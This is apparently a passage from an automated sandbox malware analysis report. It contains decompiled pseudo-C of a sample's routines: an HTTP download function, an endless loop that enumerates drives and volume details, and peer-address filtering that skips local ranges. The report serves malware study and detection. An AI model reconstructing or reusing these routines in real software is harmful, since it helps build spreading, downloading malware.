                                                                                                                                                                                                                                                                                    0x0040c3c1
                                                                                                                                                                                                                                                                                    0x0040c3d0
                                                                                                                                                                                                                                                                                    0x0040c3f9
                                                                                                                                                                                                                                                                                    0x0040c41a
                                                                                                                                                                                                                                                                                    0x0040c41f
                                                                                                                                                                                                                                                                                    0x0040c42e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c42e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c3d0
                                                                                                                                                                                                                                                                                    0x0040c442
                                                                                                                                                                                                                                                                                    0x0040c442
                                                                                                                                                                                                                                                                                    0x0040c391
                                                                                                                                                                                                                                                                                    0x0040c457
                                                                                                                                                                                                                                                                                    0x0040c457
                                                                                                                                                                                                                                                                                    0x0040c464
                                                                                                                                                                                                                                                                                    0x0040c464
                                                                                                                                                                                                                                                                                    0x0040c471
                                                                                                                                                                                                                                                                                    0x0040c471
                                                                                                                                                                                                                                                                                    0x0040c480

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040C288
                                                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(0040D079,00000000,10000000,0000003C), ref: 0040C2D8
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C2E8
                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C321
                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C357
                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C37F
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C3C8
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040C41A
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040C457
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040C464
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040C471
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID: <$GET
                                                                                                                                                                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                                                                                                                                                                    • Opcode ID: dab37fe1cf5ad5345423841208ea45a88af8b8a36c3041dfe8d9034034847e97
                                                                                                                                                                                                                                                                                    • Instruction ID: fb11e20dfced737966d96b67562c2227f08ee783dca279ae1717ab20ae365a52
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dab37fe1cf5ad5345423841208ea45a88af8b8a36c3041dfe8d9034034847e97
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44513EB1941228ABDB36CB50CC95BE973BCBB44705F0081E9A60DAA2C0D7B96FC4CF54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                    			E004054A0() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				short _v24;
                                                                                                                                                                                                                                                                                    				short _v556;
                                                                                                                                                                                                                                                                                    				short _v2604;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2608;
                                                                                                                                                                                                                                                                                    				union _ULARGE_INTEGER _v2612;
                                                                                                                                                                                                                                                                                    				long _v2616;
                                                                                                                                                                                                                                                                                    				short _v3148;
                                                                                                                                                                                                                                                                                    				intOrPtr _v3152;
                                                                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				struct %anon54 _t43;
                                                                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    				GetModuleFileNameW(0, 0x4163c0, 0x104);
                                                                                                                                                                                                                                                                                    				_t34 = E0040D180(0x4163c0);
                                                                                                                                                                                                                                                                                    				_t69 = _t68 + 4;
                                                                                                                                                                                                                                                                                    				 *0x4163b8 = _t34;
                                                                                                                                                                                                                                                                                    				while(1 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = E00404CB0();
                                                                                                                                                                                                                                                                                    					_v12 = 2;
                                                                                                                                                                                                                                                                                    					while(_v12 <= 0x19) {
                                                                                                                                                                                                                                                                                    						_t38 = E00404C50(_v8, _v12,  &_v24);
                                                                                                                                                                                                                                                                                    						_t69 = _t69 + 0xc;
                                                                                                                                                                                                                                                                                    						_v16 = _t38;
                                                                                                                                                                                                                                                                                    						_v3152 = _v16;
                                                                                                                                                                                                                                                                                    						if(_v3152 == 2 || _v3152 == 4) {
                                                                                                                                                                                                                                                                                    							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                                                                                                                                                                                                                    							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push(0x40000000);
                                                                                                                                                                                                                                                                                    							_t63 = _v2608;
                                                                                                                                                                                                                                                                                    							_push(_t63);
                                                                                                                                                                                                                                                                                    							_t43 = _v2612.LowPart;
                                                                                                                                                                                                                                                                                    							_push(_t43);
                                                                                                                                                                                                                                                                                    							L0040EE10();
                                                                                                                                                                                                                                                                                    							_push(_t63);
                                                                                                                                                                                                                                                                                    							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                                                                                                                                                                                                                    							_t70 = _t69 + 0x10;
                                                                                                                                                                                                                                                                                    							if((_v3148 & 0x0000ffff) == 0) {
                                                                                                                                                                                                                                                                                    								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                                                                                                                                                                                                                    								_t70 = _t70 + 8;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                                                                                                                                                                                                                    							E00404FC0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                                                                                                                                                                                                                    							_t69 = _t70 + 0x20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0x7d0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				ExitThread(0);
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x004054ae
                                                                                                                                                                                                                                                                                    0x004054c0
                                                                                                                                                                                                                                                                                    0x004054cb
                                                                                                                                                                                                                                                                                    0x004054d0
                                                                                                                                                                                                                                                                                    0x004054d3
                                                                                                                                                                                                                                                                                    0x004054d8
                                                                                                                                                                                                                                                                                    0x004054ea
                                                                                                                                                                                                                                                                                    0x004054ed
                                                                                                                                                                                                                                                                                    0x004054ff
                                                                                                                                                                                                                                                                                    0x00405515
                                                                                                                                                                                                                                                                                    0x0040551a
                                                                                                                                                                                                                                                                                    0x0040551d
                                                                                                                                                                                                                                                                                    0x00405523
                                                                                                                                                                                                                                                                                    0x00405530
                                                                                                                                                                                                                                                                                    0x0040555f
                                                                                                                                                                                                                                                                                    0x00405574
                                                                                                                                                                                                                                                                                    0x0040557a
                                                                                                                                                                                                                                                                                    0x0040557c
                                                                                                                                                                                                                                                                                    0x00405581
                                                                                                                                                                                                                                                                                    0x00405587
                                                                                                                                                                                                                                                                                    0x00405588
                                                                                                                                                                                                                                                                                    0x0040558e
                                                                                                                                                                                                                                                                                    0x0040558f
                                                                                                                                                                                                                                                                                    0x00405594
                                                                                                                                                                                                                                                                                    0x004055a2
                                                                                                                                                                                                                                                                                    0x004055a8
                                                                                                                                                                                                                                                                                    0x004055b4
                                                                                                                                                                                                                                                                                    0x004055c2
                                                                                                                                                                                                                                                                                    0x004055c8
                                                                                                                                                                                                                                                                                    0x004055c8
                                                                                                                                                                                                                                                                                    0x004055e5
                                                                                                                                                                                                                                                                                    0x0040560b
                                                                                                                                                                                                                                                                                    0x00405610
                                                                                                                                                                                                                                                                                    0x00405610
                                                                                                                                                                                                                                                                                    0x004054fc
                                                                                                                                                                                                                                                                                    0x004054fc
                                                                                                                                                                                                                                                                                    0x0040561d
                                                                                                                                                                                                                                                                                    0x0040561d
                                                                                                                                                                                                                                                                                    0x0040562a

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004054AE
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004163C0,00000104), ref: 004054C0
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D180: CreateFileW.KERNEL32(004054D0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040D1A0
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D180: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D1B5
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D180: CloseHandle.KERNEL32(000000FF), ref: 0040D1C2
                                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0040562A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: GetLogicalDrives.KERNEL32 ref: 00404CB6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: RegOpenKeyExW.ADVAPI32 ref: 00404D04
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404D31
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: RegCloseKey.ADVAPI32(?), ref: 00404D4E
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040561D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404C50: lstrcpyW.KERNEL32(?,?), ref: 00404CA3
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32 ref: 0040555F
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00405574
                                                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040558F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004055A2
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004055C2
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004055E5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                                                                                                                                                                                    • Opcode ID: 325e993603c8bda3392c0f0bd153b9b3ac43164d3fc352dd12edcd88a3ba2bb9
                                                                                                                                                                                                                                                                                    • Instruction ID: 9bd4fa2fb620ac2810ea8b244f600aa7f59dc27fdf478d4548bf3fce0c8904cf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 325e993603c8bda3392c0f0bd153b9b3ac43164d3fc352dd12edcd88a3ba2bb9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D418371900208BBE714DB94DC45FEE7778AB48700F1085AAF209B61D0DA799B84CF6A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 604 409a30-409a47 call 409770 607 409a49 604->607 608 409a4e-409a6a call 4094e0 strstr 604->608 609 409c53-409c56 607->609 612 409a6c-409a88 call 4094e0 strstr 608->612 613 409aad-409ac9 call 4094e0 strstr 608->613 618 409aa8 612->618 619 409a8a-409aa6 call 4094e0 strstr 612->619 620 409acb-409ae7 call 4094e0 strstr 613->620 621 409b0c-409b22 EnterCriticalSection 613->621 618->609 619->613 619->618 629 409b07 620->629 630 409ae9-409b05 call 4094e0 strstr 620->630 623 409b2d-409b36 621->623 626 409b67-409b72 call 409980 623->626 627 409b38-409b48 623->627 638 409c48-409c4d LeaveCriticalSection 626->638 639 409b78-409b86 626->639 631 409b65 627->631 632 409b4a-409b63 call 40be60 627->632 629->609 630->621 630->629 631->623 632->626 638->609 642 409b88 639->642 643 409b8c-409b9d call 408b00 639->643 642->643 643->638 646 409ba3-409bc0 call 40be60 643->646 649 409bc2-409bd1 646->649 650 409c17-409c30 646->650 651 409bd3-409bdb Sleep 649->651 652 409bdd-409c15 call 408c70 649->652 653 409c36-409c41 call 409980 650->653 651->649 652->653 653->638 658 409c43 call 409660 653->658 658->638
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409A30(signed int _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                                                                                                                    				signed char _v5;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				signed int _v13;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				signed char _t50;
                                                                                                                                                                                                                                                                                    				char* _t52;
                                                                                                                                                                                                                                                                                    				char* _t54;
                                                                                                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                                                                    				char* _t68;
                                                                                                                                                                                                                                                                                    				char* _t72;
                                                                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                                                                    				char* _t78;
                                                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                                                                                                    				char* _t95;
                                                                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t50 = E00409770(_a4);
                                                                                                                                                                                                                                                                                    				_t98 = _t97 + 4;
                                                                                                                                                                                                                                                                                    				_t74 = _t50 & 0x000000ff;
                                                                                                                                                                                                                                                                                    				if((_t50 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    					_t52 = strstr(E004094E0(_t74, _a4), "127.");
                                                                                                                                                                                                                                                                                    					_t100 = _t98 + 0xc;
                                                                                                                                                                                                                                                                                    					__eflags = _t52;
                                                                                                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						_t54 = strstr(E004094E0(_t74, _a4), "10.");
                                                                                                                                                                                                                                                                                    						_t102 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                    						__eflags = _t54;
                                                                                                                                                                                                                                                                                    						if(_t54 == 0) {
                                                                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                                                                    							EnterCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    							_v5 = 0;
                                                                                                                                                                                                                                                                                    							_v12 = 0;
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								__eflags = _v12 -  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    								if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t93 =  *((intOrPtr*)(0x416e30 + _v12 * 4));
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t93 + 4)) - _a4;
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t93 + 4)) != _a4) {
                                                                                                                                                                                                                                                                                    									_t95 = _v12 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t95;
                                                                                                                                                                                                                                                                                    									_v12 = _t95;
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t65 = E0040BE60();
                                                                                                                                                                                                                                                                                    								_t55 = _t65 - _a8;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(0x416e30 + _v12 * 4)) + 8)) = _t65 - _a8;
                                                                                                                                                                                                                                                                                    								_v5 = 1;
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							E00409980(_t55);
                                                                                                                                                                                                                                                                                    							_t57 = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                                    							__eflags = _t57;
                                                                                                                                                                                                                                                                                    							if(_t57 != 0) {
                                                                                                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                                                                                                    								LeaveCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    								return _t57;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v13 = 0;
                                                                                                                                                                                                                                                                                    							__eflags =  *0x416e2c - 0x200;
                                                                                                                                                                                                                                                                                    							if( *0x416e2c == 0x200) {
                                                                                                                                                                                                                                                                                    								_v13 = 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t57 = E00408B00(0xc);
                                                                                                                                                                                                                                                                                    							_v20 = _t57;
                                                                                                                                                                                                                                                                                    							__eflags = _v20;
                                                                                                                                                                                                                                                                                    							if(_v20 == 0) {
                                                                                                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v20 + 8)) = E0040BE60() - _a8;
                                                                                                                                                                                                                                                                                    								__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                                    								if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    									_t89 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    									_t60 = _v20;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(0x416e30 + _t89 * 4)) = _v20;
                                                                                                                                                                                                                                                                                    									_t77 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    									_t78 = _t77 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t78;
                                                                                                                                                                                                                                                                                    									 *0x416e2c = _t78;
                                                                                                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                                                                                                    									_t57 = E00409980(_t60);
                                                                                                                                                                                                                                                                                    									__eflags = _a12 & 0x000000ff;
                                                                                                                                                                                                                                                                                    									if((_a12 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    										_t57 = E00409660(_t57);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L27;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									L21:
                                                                                                                                                                                                                                                                                    									_t61 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    									__eflags =  *(0x416e2c[_t61]);
                                                                                                                                                                                                                                                                                    									if( *(0x416e2c[_t61]) == 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									Sleep(1);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t91 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    								 *(0x416e2c[_t91]) = 1;
                                                                                                                                                                                                                                                                                    								_t80 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    								E00408C70(0x416e2c[_t80]);
                                                                                                                                                                                                                                                                                    								_t60 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    								0x416e2c[_t60] = _v20;
                                                                                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t68 = strstr(E004094E0(_t74, _a4), ".10");
                                                                                                                                                                                                                                                                                    						_t106 = _t102 + 0xc;
                                                                                                                                                                                                                                                                                    						__eflags = _t68;
                                                                                                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                                                    							return _t68;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t68 = strstr(E004094E0(_a4, _a4), ".10.");
                                                                                                                                                                                                                                                                                    						_t102 = _t106 + 0xc;
                                                                                                                                                                                                                                                                                    						__eflags = _t68;
                                                                                                                                                                                                                                                                                    						if(_t68 != 0) {
                                                                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t72 = strstr(E004094E0(_t74, _a4), ".127");
                                                                                                                                                                                                                                                                                    					_t109 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                    					__eflags = _t72;
                                                                                                                                                                                                                                                                                    					if(_t72 == 0) {
                                                                                                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                                                                                                    						return _t72;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t74 = _a4;
                                                                                                                                                                                                                                                                                    					_t72 = strstr(E004094E0(_a4, _a4), ".127.");
                                                                                                                                                                                                                                                                                    					_t100 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                    					__eflags = _t72;
                                                                                                                                                                                                                                                                                    					if(_t72 != 0) {
                                                                                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t50;
                                                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                                                    0x00409a3a
                                                                                                                                                                                                                                                                                    0x00409a3f
                                                                                                                                                                                                                                                                                    0x00409a42
                                                                                                                                                                                                                                                                                    0x00409a47
                                                                                                                                                                                                                                                                                    0x00409a60
                                                                                                                                                                                                                                                                                    0x00409a65
                                                                                                                                                                                                                                                                                    0x00409a68
                                                                                                                                                                                                                                                                                    0x00409a6a
                                                                                                                                                                                                                                                                                    0x00409aad
                                                                                                                                                                                                                                                                                    0x00409abf
                                                                                                                                                                                                                                                                                    0x00409ac4
                                                                                                                                                                                                                                                                                    0x00409ac7
                                                                                                                                                                                                                                                                                    0x00409ac9
                                                                                                                                                                                                                                                                                    0x00409b0c
                                                                                                                                                                                                                                                                                    0x00409b11
                                                                                                                                                                                                                                                                                    0x00409b17
                                                                                                                                                                                                                                                                                    0x00409b1b
                                                                                                                                                                                                                                                                                    0x00409b2d
                                                                                                                                                                                                                                                                                    0x00409b30
                                                                                                                                                                                                                                                                                    0x00409b36
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b3b
                                                                                                                                                                                                                                                                                    0x00409b45
                                                                                                                                                                                                                                                                                    0x00409b48
                                                                                                                                                                                                                                                                                    0x00409b27
                                                                                                                                                                                                                                                                                    0x00409b27
                                                                                                                                                                                                                                                                                    0x00409b2a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b2a
                                                                                                                                                                                                                                                                                    0x00409b4a
                                                                                                                                                                                                                                                                                    0x00409b4f
                                                                                                                                                                                                                                                                                    0x00409b5c
                                                                                                                                                                                                                                                                                    0x00409b5f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b5f
                                                                                                                                                                                                                                                                                    0x00409b67
                                                                                                                                                                                                                                                                                    0x00409b6c
                                                                                                                                                                                                                                                                                    0x00409b70
                                                                                                                                                                                                                                                                                    0x00409b72
                                                                                                                                                                                                                                                                                    0x00409c48
                                                                                                                                                                                                                                                                                    0x00409c4d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409c4d
                                                                                                                                                                                                                                                                                    0x00409b78
                                                                                                                                                                                                                                                                                    0x00409b7c
                                                                                                                                                                                                                                                                                    0x00409b86
                                                                                                                                                                                                                                                                                    0x00409b88
                                                                                                                                                                                                                                                                                    0x00409b88
                                                                                                                                                                                                                                                                                    0x00409b8e
                                                                                                                                                                                                                                                                                    0x00409b96
                                                                                                                                                                                                                                                                                    0x00409b99
                                                                                                                                                                                                                                                                                    0x00409b9d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409ba3
                                                                                                                                                                                                                                                                                    0x00409ba9
                                                                                                                                                                                                                                                                                    0x00409bb7
                                                                                                                                                                                                                                                                                    0x00409bbe
                                                                                                                                                                                                                                                                                    0x00409bc0
                                                                                                                                                                                                                                                                                    0x00409c17
                                                                                                                                                                                                                                                                                    0x00409c1d
                                                                                                                                                                                                                                                                                    0x00409c20
                                                                                                                                                                                                                                                                                    0x00409c27
                                                                                                                                                                                                                                                                                    0x00409c2d
                                                                                                                                                                                                                                                                                    0x00409c2d
                                                                                                                                                                                                                                                                                    0x00409c30
                                                                                                                                                                                                                                                                                    0x00409c36
                                                                                                                                                                                                                                                                                    0x00409c36
                                                                                                                                                                                                                                                                                    0x00409c3f
                                                                                                                                                                                                                                                                                    0x00409c41
                                                                                                                                                                                                                                                                                    0x00409c43
                                                                                                                                                                                                                                                                                    0x00409c43
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409bc2
                                                                                                                                                                                                                                                                                    0x00409bc2
                                                                                                                                                                                                                                                                                    0x00409bc2
                                                                                                                                                                                                                                                                                    0x00409bce
                                                                                                                                                                                                                                                                                    0x00409bd1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409bd5
                                                                                                                                                                                                                                                                                    0x00409bd5
                                                                                                                                                                                                                                                                                    0x00409bdd
                                                                                                                                                                                                                                                                                    0x00409bea
                                                                                                                                                                                                                                                                                    0x00409bf0
                                                                                                                                                                                                                                                                                    0x00409bfe
                                                                                                                                                                                                                                                                                    0x00409c06
                                                                                                                                                                                                                                                                                    0x00409c0e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409c0e
                                                                                                                                                                                                                                                                                    0x00409b9d
                                                                                                                                                                                                                                                                                    0x00409add
                                                                                                                                                                                                                                                                                    0x00409ae2
